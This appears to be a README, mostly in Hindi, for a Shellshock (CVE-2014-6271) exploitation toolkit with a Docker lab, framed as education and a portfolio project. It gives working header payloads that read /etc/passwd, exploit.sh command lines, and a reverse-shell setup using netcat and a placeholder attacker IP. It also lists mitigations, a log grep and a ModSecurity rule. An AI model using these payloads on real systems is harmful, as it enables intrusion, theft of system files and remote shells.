Recreating Shellshock (CVE-2014-6271) - the bash vulnerability that endangered millions of servers. Automated exploitation toolkit + Burp Suite methodology + Docker lab. Built for security research & education. Offensive security portfolio project.
CVE-2014-6271 (Shellshock) के लिए स्वचालित शोषण टूलकिट
2014 में लाखों सर्वरों को प्रभावित करने वाली Shellshock कमजोरी को प्रदर्शित करने वाला एक पूर्ण सुरक्षा अनुसंधान परियोजना। इसमें स्वचालित स्कैनिंग, शोषण क्षमताएँ और रक्षात्मक सिफारिशें शामिल हैं।
Demo
Shellshock (CVE-2014-6271) Bash शेल में एक गंभीर कमजोरी है जो पर्यावरण चर के माध्यम से दूरस्थ कोड निष्पादन की अनुमति देती है। 2014 में 22 वर्षों तक मौजूद रहने के बाद खोजा गया, इसने दुनिया भर में लाखों Unix/Linux सिस्टम को प्रभावित किया।
यह कैसे काम करता है:
# सामान्य: Bash फ़ंक्शंस को पर्यावरण चर के रूप में निर्यात करता है
my_function='() { echo "hello"; }'
# बग: Bash फ़ंक्शन परिभाषा के बाद पार्सिंग जारी रखता है
exploit='() { :;}; echo "PWNED"' # दूसरा कमांड निष्पादित होता है
CGI का उपयोग करने वाले वेब सर्वर HTTP हेडर को पर्यावरण चर के रूप में Bash में पास करते हैं, जिससे वे कमजोर हो जाते हैं:
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'
# क्लोन और सेटअप
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse
# कमजोर लैब शुरू करें
docker-compose up -d
# एक्सप्लॉइट चलाएँ
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"
स्वचालित स्कैनर
शोषण उपकरण
लैब वातावरण
./exploit.sh --scan --target localhost --port 8080
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"
# टर्मिनल 1
nc -lvnp 4444
# टर्मिनल 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444


User-Agent हेडर को संशोधित करें:
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

सर्वर आपके कमांड को निष्पादित करता है और आउटपुट लौटाता है।
क्लाइंट (हमलावर)
│
│ दुर्भावनापूर्ण User-Agent के साथ HTTP अनुरोध
▼
वेब सर्वर
│
│ हेडर को पर्यावरण चर के रूप में पास करता है
▼
CGI स्क्रिप्ट
│
│ Bash प्रक्रिया शुरू करता है
▼
Bash शेल
│
│ फ़ंक्शन को पार्स करता है + अनुगामी कमांड निष्पादित करता है
▼
कमांड निष्पादन (RCE)
जब Bash एक पर्यावरण चर में फ़ंक्शन परिभाषा का सामना करता है:
() { :;}# Bash अपडेट करें
sudo apt-get update && sudo apt-get upgrade bash
# यदि आवश्यक न हो तो CGI अक्षम करें
sudo a2dismod cgi && sudo systemctl restart apache2
# शोषण प्रयासों के लिए लॉग जाँचें
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"
bash-apocalypse/
├── README.md
├── exploit.sh # मुख्य उपकरण
├── payloads.txt # परीक्षण पेलोड
├── docker-compose.yml # लैब सेटअप
└── screenshots/
├── intercept.png
├── Payload.png
└── result.png
केवल शैक्षिक उद्देश्यों के लिए। केवल उन सिस्टम का परीक्षण करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। अनधिकृत पहुँच अवैध है।
यह समझने के लिए बनाया गया है कि कमजोरियाँ कैसे काम करती हैं और उनसे कैसे बचाव करें। ;)